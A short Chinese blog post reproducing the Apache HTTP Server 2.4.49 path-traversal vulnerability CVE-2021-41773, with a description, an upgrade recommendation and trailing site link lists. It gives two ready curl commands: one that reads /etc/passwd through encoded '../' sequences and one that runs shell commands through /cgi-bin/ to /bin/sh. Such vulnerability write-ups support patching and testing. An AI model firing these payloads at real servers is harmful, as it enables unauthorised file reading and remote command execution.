apache 文件读取&命令执行(CVE-2021-41773)

慕筱蚺2023-12-29 12:22

漏洞描述:

CVE-2021-41773 漏洞是在 9 月 15 日发布的 2.4.49 版中对路径规范化所做的更改引入到 Apache HTTP Server 中的。此漏洞仅影响具有"require all denied"访问权限控制配置被禁用的Apache HTTP Server 2.4.49 版本。成功的利用将使远程攻击者能够访问易受攻击的 Web 服务器上文档根目录之外的任意文件。根据该公告,该漏洞还可能泄露"CGI 脚本等解释文件的来源",其中可能包含攻击者可以利用该漏洞进行进一步攻击的敏感信息。

复现过程:

1.访问ip:port

2.文件读取

cs 复制代码 
curl -v --path-as-is http://ip:port/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

3.命令执行

cs 复制代码 
curl --data "echo;whoami" http://ip:port/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

修复建议:

确保Apache HTTP Server更新到最新的版本2.4.50。

相关推荐
小小龙学IT4 天前
Apache Airflow 2.x 深度指南:用 Python 编排一切的现代化工作流引擎
开发语言·python·apache
Shepherd06194 天前
【IT 运维】Apache 使用 mod_remoteip 恢复 Cloudflare 后的真实访客 IP
运维·tcp/ip·apache
isyangli_blog4 天前
SDN 基本应用实践 —— 使用命令行实现简易防火墙功能实验报告
服务器·php·apache
小小龙学IT5 天前
Apache Pulsar 深度解析:从架构设计到生产落地
apache
Full Stack Developme6 天前
Apache Tika 教程
java·开发语言·python·apache
laplaya6 天前
C++大型项目组件通信与依赖管理实践
c++·log4j·apache
万岳科技7 天前
教育培训小程序如何构建线上线下一体化教学体系
小程序·apache
yyuuuzz7 天前
云服务器软件部署的几个常见问题
运维·服务器·开发语言·网络·云计算·php·apache
分布式存储与RustFS7 天前
Apache Iceberg数据湖轻量化搭建:基于Rust开源存储方案
开源·apache·iceberg·rustfs·ai存储·ai memory·s3 table
睡不醒男孩0308237 天前
中启乘数 CLup 6.x Apache Doris 存算一体集群管理技术文档
apache·doris·clup
热门推荐
012026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?022026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?03【AI】2026 年具身智能模型和世界模型总结042026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf05GitHub 镜像站点06AI科技热点日报 | 2026年6月1日07AI一周事件 · 2026-06-03 至 2026-06-0908上线仅72小时被强制下架:Claude Fable 5 的短命09Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析102026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?